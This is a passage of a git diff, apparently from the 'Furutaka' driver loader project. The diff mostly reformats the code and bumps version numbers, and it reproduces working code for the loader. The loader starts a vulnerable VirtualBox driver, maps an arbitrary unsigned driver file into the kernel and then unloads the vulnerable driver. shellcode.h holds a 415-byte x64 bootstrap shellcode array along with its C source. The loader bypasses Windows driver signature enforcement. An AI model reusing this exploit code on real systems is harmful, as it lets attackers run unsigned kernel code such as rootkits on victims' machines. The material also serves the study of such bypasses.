g_ConsoleOutput, TRUE); - break; - } + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + break; + } - //post cleanup - if (schSCManager != NULL) { - CloseServiceHandle(schSCManager); - } - return hDevice; + //post cleanup + if (schSCManager != NULL) { + CloseServiceHandle(schSCManager); + } + return hDevice; } /* @@ -638,72 +638,74 @@ HANDLE TDLStartVulnerableDriver( * */ void TDLStopVulnerableDriver( - VOID - ) + VOID +) { - SC_HANDLE schSCManager; - LPWSTR msg; - UNICODE_STRING uStr; - OBJECT_ATTRIBUTES ObjectAttributes; + SC_HANDLE schSCManager; + LPWSTR msg; + UNICODE_STRING uStr; + OBJECT_ATTRIBUTES ObjectAttributes; - cuiPrintText(g_ConOut, - TEXT("SCM: Unloading vulnerable driver"), - g_ConsoleOutput, TRUE); + cuiPrintText(g_ConOut, + TEXT("SCM: Unloading vulnerable driver"), + g_ConsoleOutput, TRUE); - if (g_hVBox != INVALID_HANDLE_VALUE) - CloseHandle(g_hVBox); + if (g_hVBox != INVALID_HANDLE_VALUE) + CloseHandle(g_hVBox); - schSCManager = OpenSCManager(NULL, - NULL, - SC_MANAGER_ALL_ACCESS - ); + schSCManager = OpenSCManager(NULL, + NULL, + SC_MANAGER_ALL_ACCESS + ); - if (schSCManager == NULL) { - cuiPrintText(g_ConOut, - TEXT("SCM: Cannot open database, unable unload driver"), - g_ConsoleOutput, TRUE); - return; - } + if (schSCManager == NULL) { + cuiPrintText(g_ConOut, + TEXT("SCM: Cannot open database, unable unload driver"), + g_ConsoleOutput, TRUE); + return; + } + //stop driver in any case + if (scmStopDriver(schSCManager, VBoxDrvSvc)) + msg = TEXT("SCM: Vulnerable driver successfully unloaded"); + else + msg = TEXT("SCM: Unexpected error while unloading driver"); - //stop driver in any case - if (scmStopDriver(schSCManager, VBoxDrvSvc)) - msg = TEXT("SCM: Vulnerable driver successfully unloaded"); - else - msg = TEXT("SCM: Unexpected error while unloading driver"); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + //if VBox not installed - remove from scm database and delete file + if (g_VBoxInstalled == FALSE) { - //if VBox not installed - remove from scm database and delete file - if (g_VBoxInstalled == FALSE) { + if (scmRemoveDriver(schSCManager, VBoxDrvSvc)) + msg = TEXT("SCM: Driver entry removed from registry"); + else + msg = TEXT("SCM: Error removing driver entry from registry"); - if (scmRemoveDriver(schSCManager, VBoxDrvSvc)) - msg = TEXT("SCM: Driver entry removed from registry"); - else - msg = TEXT("SCM: Error removing driver entry from registry"); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + uStr.Buffer = NULL; + uStr.Length = 0; + uStr.MaximumLength = 0; + RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\systemroot\\system32\\drivers\\VBoxDrv.sys"); + InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_CASE_INSENSITIVE, NULL, NULL); + if (NT_SUCCESS(NtDeleteFile(&ObjectAttributes))) + msg = TEXT("Ldr: Driver file removed"); + else + msg = TEXT("Ldr: Error removing driver file"); - RtlInitUnicodeString(&uStr, L"\\??\\globalroot\\systemroot\\system32\\drivers\\VBoxDrv.sys"); - InitializeObjectAttributes(&ObjectAttributes, &uStr, OBJ_CASE_INSENSITIVE, NULL, NULL); - if (NT_SUCCESS(NtDeleteFile(&ObjectAttributes))) - msg = TEXT("Ldr: Driver file removed"); - else - msg = TEXT("Ldr: Error removing driver file"); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + } + else { + //VBox software present, restore original driver and exit + if (supBackupVBoxDrv(TRUE)) + msg = TEXT("Ldr: Original driver restored"); + else + msg = TEXT("Ldr: Unexpected error while restoring original driver"); - } - else { - //VBox software present, restore original driver and exit - if (supBackupVBoxDrv(TRUE)) - msg = TEXT("Ldr: Original driver restored"); - else - msg = TEXT("Ldr: Unexpected error while restoring original driver"); - - cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); - } - CloseServiceHandle(schSCManager); + cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE); + } + CloseServiceHandle(schSCManager); } /* @@ -715,37 +717,37 @@ void TDLStopVulnerableDriver( * */ UINT TDLProcessCommandLine( - LPWSTR lpCommandLine - ) + LPWSTR lpCommandLine +) { - UINT retVal = (UINT)-1; - WCHAR szInputFile[MAX_PATH + 1]; - ULONG c; - - //input file - c = 0; - RtlSecureZeroMemory(szInputFile, sizeof(szInputFile)); - GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c); - if (c == 0) { - cuiPrintText(g_ConOut, - T_LOADERUSAGE, - g_ConsoleOutput, FALSE); - return retVal; - } + UINT retVal = (UINT)-1; + WCHAR szInputFile[MAX_PATH + 1]; + ULONG c; - if (PathFileExists(szInputFile)) { - g_hVBox = TDLStartVulnerableDriver(); - if (g_hVBox != INVALID_HANDLE_VALUE) { - retVal = TDLMapDriver(szInputFile); - TDLStopVulnerableDriver(); - } - } - else { - cuiPrintText(g_ConOut, - TEXT("Ldr: Input file not found"), - g_ConsoleOutput, FALSE); - } - return retVal; + //input file + c = 0; + RtlSecureZeroMemory(szInputFile, sizeof(szInputFile)); + GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c); + if (c == 0) { + cuiPrintText(g_ConOut, + T_LOADERUSAGE, + g_ConsoleOutput, FALSE); + return retVal; + } + + if (PathFileExists(szInputFile)) { + g_hVBox = TDLStartVulnerableDriver(); + if (g_hVBox != INVALID_HANDLE_VALUE) { + retVal = TDLMapDriver(szInputFile); + TDLStopVulnerableDriver(); + } + } + else { + cuiPrintText(g_ConOut, + TEXT("Ldr: Input file not found"), + g_ConsoleOutput, FALSE); + } + return retVal; } /* @@ -759,80 +761,81 @@ UINT TDLProcessCommandLine( void TDLMain() { - BOOL cond = FALSE; - UINT uResult = 0; - DWORD dwTemp; - LONG x; - OSVERSIONINFOW osv; - WCHAR text[256]; + BOOL cond = FALSE; + UINT uResult = 0; + DWORD dwTemp; + LONG x; + OSVERSIONINFOW osv; + WCHAR text[256]; - __security_init_cookie(); + __security_init_cookie(); - do { - g_hInstance = GetModuleHandle(NULL); + do { - g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); - if (g_ConOut == INVALID_HANDLE_VALUE) { - uResult = (UINT)-1; - break; - } + g_hInstance = GetModuleHandle(NULL); - g_ConsoleOutput = TRUE; - if (!GetConsoleMode(g_ConOut, &dwTemp)) { - g_ConsoleOutput = FALSE; - } + g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE); + if (g_ConOut == INVALID_HANDLE_VALUE) { + uResult = (UINT)-1; + break; + } - SetConsoleTitle(T_LOADERTITLE); - SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); - if (g_ConsoleOutput == FALSE) { - WriteFile(g_ConOut, &BE, sizeof(WCHAR), &dwTemp, NULL); - } + g_ConsoleOutput = TRUE; + if (!GetConsoleMode(g_ConOut, &dwTemp)) { + g_ConsoleOutput = FALSE; + } - cuiPrintText(g_ConOut, - T_LOADERINTRO, - g_ConsoleOutput, TRUE); + SetConsoleTitle(T_LOADERTITLE); + SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT); + if (g_ConsoleOutput == FALSE) { + WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL); + } + + cuiPrintText(g_ConOut, + T_LOADERINTRO, + g_ConsoleOutput, TRUE); - x = InterlockedIncrement((PLONG)&g_lApplicationInstances); - if (x > 1) { - cuiPrintText(g_ConOut, - T_LOADERRUN, - g_ConsoleOutput, FALSE); - uResult = (UINT)-1; - break; - } + x = InterlockedIncrement((PLONG)&g_lApplicationInstances); + if (x > 1) { + cuiPrintText(g_ConOut, + T_LOADERRUN, + g_ConsoleOutput, FALSE); + uResult = (UINT)-1; + break; + } - //check version first - RtlSecureZeroMemory(&osv, sizeof(osv)); - osv.dwOSVersionInfoSize = sizeof(osv); - RtlGetVersion((PRTL_OSVERSIONINFOW)&osv); - if (osv.dwMajorVersion < 6) { - cuiPrintText(g_ConOut, - T_LOADERUNSUP, - g_ConsoleOutput, FALSE); - uResult = (UINT)-1; - break; - } + //check version first + RtlSecureZeroMemory(&osv, sizeof(osv)); + osv.dwOSVersionInfoSize = sizeof(osv); + RtlGetVersion((PRTL_OSVERSIONINFOW)&osv); + if (osv.dwMajorVersion < 6) { + cuiPrintText(g_ConOut, + T_LOADERUNSUP, + g_ConsoleOutput, FALSE); + uResult = (UINT)-1; + break; + } - _strcpy(text, TEXT("Ldr: Windows v")); - ultostr(osv.dwMajorVersion, _strend(text)); - _strcat(text, TEXT(".")); - ultostr(osv.dwMinorVersion, _strend(text)); - _strcat(text, TEXT(" build ")); - ultostr(osv.dwBuildNumber, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + _strcpy(text, TEXT("Ldr: Windows v")); + ultostr(osv.dwMajorVersion, _strend(text)); + _strcat(text, TEXT(".")); + ultostr(osv.dwMinorVersion, _strend(text)); + _strcat(text, TEXT(" build ")); + ultostr(osv.dwBuildNumber, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - g_VBoxInstalled = TDLVBoxInstalled(); - if (g_VBoxInstalled) { - cuiPrintText(g_ConOut, - TEXT("Ldr: Warning VirtualBox software installed, conficts possible"), - g_ConsoleOutput, TRUE); - } + g_VBoxInstalled = TDLVBoxInstalled(); + if (g_VBoxInstalled) { + cuiPrintText(g_ConOut, + TEXT("Ldr: Warning, VirtualBox software installed, conflicts are possible"), + g_ConsoleOutput, TRUE); + } - uResult = TDLProcessCommandLine(GetCommandLine()); + uResult = TDLProcessCommandLine(GetCommandLine()); - } while (cond); + } while (cond); - InterlockedDecrement((PLONG)&g_lApplicationInstances); - ExitProcess(uResult); + InterlockedDecrement((PLONG)&g_lApplicationInstances); + ExitProcess(uResult); } diff --git a/Source/Furutaka/resource.rc b/Source/Furutaka/resource.rc index b664ad4..351f442 100644 Binary files a/Source/Furutaka/resource.rc and b/Source/Furutaka/resource.rc differ diff --git a/Source/Furutaka/shellcode.h b/Source/Furutaka/shellcode.h index d91f0bc..469aa42 100644 --- a/Source/Furutaka/shellcode.h +++ b/Source/Furutaka/shellcode.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: SHELLCODE.H * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 30 Jan 2016 +* DATE: 17 Apr 2017 * * Loader bootstrap shellcode. * @@ -20,20 +20,20 @@ #pragma once typedef PVOID(NTAPI *PfnExAllocatePoolWithTag)( - _In_ POOL_TYPE PoolType, - _In_ SIZE_T NumberOfBytes, - _In_ ULONG Tag - ); + _In_ POOL_TYPE PoolType, + _In_ SIZE_T NumberOfBytes, + _In_ ULONG Tag + ); typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( - _Out_ PHANDLE ThreadHandle, - _In_ ULONG DesiredAccess, - _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, - _In_opt_ HANDLE ProcessHandle, - _Out_opt_ PCLIENT_ID ClientId, - _In_ PKSTART_ROUTINE StartRoutine, - _In_opt_ PVOID StartContext - ); + _Out_ PHANDLE ThreadHandle, + _In_ ULONG DesiredAccess, + _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, + _In_opt_ HANDLE ProcessHandle, + _Out_opt_ PCLIENT_ID ClientId, + _In_ PKSTART_ROUTINE StartRoutine, + _In_opt_ PVOID StartContext + ); /* * TDLBootstrapLoader @@ -45,101 +45,101 @@ typedef NTSTATUS(NTAPI *PfnPsCreateSystemThread)( */ /* void TDLBootstrapLoader( - PfnExAllocatePoolWithTag ExAllocatePoolWithTag, - PfnPsCreateSystemThread PsCreateSystemThread) + PfnExAllocatePoolWithTag ExAllocatePoolWithTag, + PfnPsCreateSystemThread PsCreateSystemThread) { - ULONG_PTR pos, exbuffer, - Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200; + ULONG_PTR pos, exbuffer, + Image = ((ULONG_PTR)&TDLBootstrapLoader) + 0x200; - PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; - PIMAGE_FILE_HEADER fileh = - (PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew); + PIMAGE_DOS_HEADER dosh = (PIMAGE_DOS_HEADER)Image; + PIMAGE_FILE_HEADER fileh = + (PIMAGE_FILE_HEADER)(Image + sizeof(DWORD) + dosh->e_lfanew); - PIMAGE_OPTIONAL_HEADER popth = - (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); + PIMAGE_OPTIONAL_HEADER popth = + (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER)); - ULONG isz = popth->SizeOfImage; - HANDLE th; + ULONG isz = popth->SizeOfImage; + HANDLE th; - PIMAGE_BASE_RELOCATION rel; - DWORD_PTR delta; - LPWORD chains; - DWORD c, p, rsz; + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; - OBJECT_ATTRIBUTES attr; + OBJECT_ATTRIBUTES attr; - exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( - NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; - exbuffer &= ~(PAGE_SIZE - 1); + exbuffer = (ULONG_PTR)ExAllocatePoolWithTag( + NonPagedPool, isz + PAGE_SIZE, 'SldT') + PAGE_SIZE; + exbuffer &= ~(PAGE_SIZE - 1); - if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) - if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) - { - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + - popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); - rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; - delta = (DWORD_PTR)exbuffer - popth->ImageBase; - c = 0; + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)exbuffer - popth->ImageBase; + c = 0; - while (c < rsz) { - p = sizeof(IMAGE_BASE_RELOCATION); - chains = (LPWORD)((PBYTE)rel + p); + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); - while (p < rel->SizeOfBlock) { + while (p < rel->SizeOfBlock) { - switch (*chains >> 12) { - case IMAGE_REL_BASED_HIGHLOW: - *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; - break; - case IMAGE_REL_BASED_DIR64: - *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; - break; - } + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } - chains++; - p += sizeof(WORD); - } + chains++; + p += sizeof(WORD); + } - c += rel->SizeOfBlock; - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); - } - } + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } - isz >>= 3; - for (pos = 0; pos < isz; pos++) - ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; + isz >>= 3; + for (pos = 0; pos < isz; pos++) + ((PULONG64)exbuffer)[pos] = ((PULONG64)Image)[pos]; - InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); - PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, - (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); + InitializeObjectAttributes(&attr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL); + PsCreateSystemThread(&th, THREAD_ALL_ACCESS, &attr, NULL, NULL, + (PKSTART_ROUTINE)(exbuffer + popth->AddressOfEntryPoint), NULL); } */ static const unsigned char TDLBootstrapLoader_code[415] = { - 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, - 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, - 0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, - 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, - 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, - 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, - 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, - 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, - 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, - 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, - 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, - 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, - 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, - 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, - 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, - 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, - 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, - 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, - 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, - 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, - 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, - 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, - 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, - 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, - 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, - 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 + 0x40, 0x53, 0x56, 0x41, 0x54, 0x41, 0x55, 0x41, 0x56, 0x48, 0x83, 0xEC, 0x70, 0x4C, 0x8B, 0xE2, + 0x4C, 0x89, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xC9, 0x48, 0x8D, 0x1D, 0xDE, 0xFF, + 0xFF, 0xFF, 0x48, 0x81, 0xC3, 0x00, 0x02, 0x00, 0x00, 0x33, 0xC9, 0x41, 0xB8, 0x54, 0x64, 0x6C, + 0x53, 0x4C, 0x63, 0x73, 0x3C, 0x4C, 0x03, 0xF3, 0x45, 0x8B, 0x7E, 0x50, 0x41, 0x8D, 0x97, 0x00, + 0x10, 0x00, 0x00, 0x41, 0xFF, 0xD1, 0x45, 0x33, 0xED, 0x48, 0x8D, 0xB0, 0x00, 0x10, 0x00, 0x00, + 0x48, 0x81, 0xE6, 0x00, 0xF0, 0xFF, 0xFF, 0x41, 0x83, 0xBE, 0x84, 0x00, 0x00, 0x00, 0x05, 0x0F, + 0x86, 0xAB, 0x00, 0x00, 0x00, 0x41, 0x8B, 0x8E, 0xB0, 0x00, 0x00, 0x00, 0x85, 0xC9, 0x0F, 0x84, + 0x9C, 0x00, 0x00, 0x00, 0x48, 0x89, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x4C, 0x8D, 0x04, 0x0B, + 0x41, 0x8B, 0xAE, 0xB4, 0x00, 0x00, 0x00, 0x4C, 0x8B, 0xDE, 0x4D, 0x2B, 0x5E, 0x30, 0x48, 0x89, + 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x41, 0x8B, 0xFD, 0x85, 0xED, 0x74, 0x63, 0x0F, 0x1F, 0x00, + 0x41, 0xB9, 0x08, 0x00, 0x00, 0x00, 0x4D, 0x8D, 0x50, 0x08, 0x45, 0x39, 0x48, 0x04, 0x76, 0x43, + 0x41, 0x0F, 0xB7, 0x02, 0x8B, 0xC8, 0xC1, 0xE9, 0x0C, 0x83, 0xF9, 0x03, 0x74, 0x17, 0x83, 0xF9, + 0x0A, 0x75, 0x22, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, 0x03, 0x4C, + 0x01, 0x1C, 0x0A, 0xEB, 0x10, 0x41, 0x8B, 0x10, 0x25, 0xFF, 0x0F, 0x00, 0x00, 0x48, 0x8D, 0x0C, + 0x03, 0x44, 0x01, 0x1C, 0x0A, 0x49, 0x83, 0xC2, 0x02, 0x41, 0x83, 0xC1, 0x02, 0x45, 0x3B, 0x48, + 0x04, 0x72, 0xBD, 0x41, 0x8B, 0x40, 0x04, 0x03, 0xF8, 0x4C, 0x03, 0xC0, 0x3B, 0xFD, 0x72, 0xA0, + 0x48, 0x8B, 0xAC, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0xBC, 0x24, 0xB0, 0x00, 0x00, 0x00, + 0x49, 0x8B, 0xD7, 0x4C, 0x8B, 0xBC, 0x24, 0xB8, 0x00, 0x00, 0x00, 0x48, 0xC1, 0xEA, 0x03, 0x48, + 0x85, 0xD2, 0x74, 0x1D, 0x48, 0x8B, 0xCE, 0x48, 0x2B, 0xDE, 0x66, 0x0F, 0x1F, 0x44, 0x00, 0x00, + 0x48, 0x8B, 0x04, 0x0B, 0x48, 0x89, 0x01, 0x48, 0x8D, 0x49, 0x08, 0x48, 0x83, 0xEA, 0x01, 0x75, + 0xEF, 0x0F, 0x57, 0xC0, 0xC7, 0x44, 0x24, 0x40, 0x30, 0x00, 0x00, 0x00, 0xF3, 0x0F, 0x7F, 0x44, + 0x24, 0x60, 0x4C, 0x89, 0x6C, 0x24, 0x48, 0x4C, 0x8D, 0x44, 0x24, 0x40, 0xC7, 0x44, 0x24, 0x58, + 0x00, 0x02, 0x00, 0x00, 0x48, 0x8D, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x4C, 0x89, 0x6C, 0x24, + 0x50, 0x45, 0x33, 0xC9, 0x41, 0x8B, 0x46, 0x28, 0xBA, 0xFF, 0xFF, 0x1F, 0x00, 0x48, 0x03, 0xC6, + 0x4C, 0x89, 0x6C, 0x24, 0x30, 0x48, 0x89, 0x44, 0x24, 0x28, 0x4C, 0x89, 0x6C, 0x24, 0x20, 0x41, + 0xFF, 0xD4, 0x48, 0x83, 0xC4, 0x70, 0x41, 0x5E, 0x41, 0x5D, 0x41, 0x5C, 0x5E, 0x5B, 0xC3 }; diff --git a/Source/Furutaka/sup.c b/Source/Furutaka/sup.c index b1d4b91..c23db86 100644 --- a/Source/Furutaka/sup.c +++ b/Source/Furutaka/sup.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: SUP.C * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 01 Feb 2016 +* DATE: 17 Apr 2017 * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED @@ -25,43 +25,43 @@ * */ PVOID supGetSystemInfo( - _In_ SYSTEM_INFORMATION_CLASS InfoClass - ) + _In_ SYSTEM_INFORMATION_CLASS InfoClass +) { - INT c = 0; - PVOID Buffer = NULL; - ULONG Size = 0x1000; - NTSTATUS status; - ULONG memIO; - PVOID hHeap = NtCurrentPeb()->ProcessHeap; + INT c = 0; + PVOID Buffer = NULL; + ULONG Size = 0x1000; + NTSTATUS status; + ULONG memIO; + PVOID hHeap = NtCurrentPeb()->ProcessHeap; - do { - Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size); - if (Buffer != NULL) { - status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO); - } - else { - return NULL; - } - if (status == STATUS_INFO_LENGTH_MISMATCH) { - RtlFreeHeap(hHeap, 0, Buffer); - Size *= 2; - c++; - if (c > 100) { - status = STATUS_SECRET_TOO_LONG; - break; - } - } - } while (status == STATUS_INFO_LENGTH_MISMATCH); + do { + Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size); + if (Buffer != NULL) { + status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO); + } + else { + return NULL; + } + if (status == STATUS_INFO_LENGTH_MISMATCH) { + RtlFreeHeap(hHeap, 0, Buffer); + Size *= 2; + c++; + if (c > 100) { + status = STATUS_SECRET_TOO_LONG; + break; + } + } + } while (status == STATUS_INFO_LENGTH_MISMATCH); - if (NT_SUCCESS(status)) { - return Buffer; - } + if (NT_SUCCESS(status)) { + return Buffer; + } - if (Buffer) { - RtlFreeHeap(hHeap, 0, Buffer); - } - return NULL; + if (Buffer) { + RtlFreeHeap(hHeap, 0, Buffer); + } + return NULL; } /* @@ -73,19 +73,19 @@ PVOID supGetSystemInfo( * */ ULONG_PTR supGetNtOsBase( - VOID - ) + VOID +) { - PRTL_PROCESS_MODULES miSpace; - ULONG_PTR NtOsBase = 0; + PRTL_PROCESS_MODULES miSpace; + ULONG_PTR NtOsBase = 0; - miSpace = supGetSystemInfo(SystemModuleInformation); - while (miSpace != NULL) { - NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; - RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace); - break; - } - return NtOsBase; + miSpace = supGetSystemInfo(SystemModuleInformation); + while (miSpace != NULL) { + NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase; + RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace); + break; + } + return NtOsBase; } /* @@ -97,34 +97,34 @@ ULONG_PTR supGetNtOsBase( * */ PBYTE supQueryResourceData( - _In_ ULONG_PTR ResourceId, - _In_ PVOID DllHandle, - _In_ PULONG DataSize - ) + _In_ ULONG_PTR ResourceId, + _In_ PVOID DllHandle, + _In_ PULONG DataSize +) { - NTSTATUS status; - ULONG_PTR IdPath[3]; - 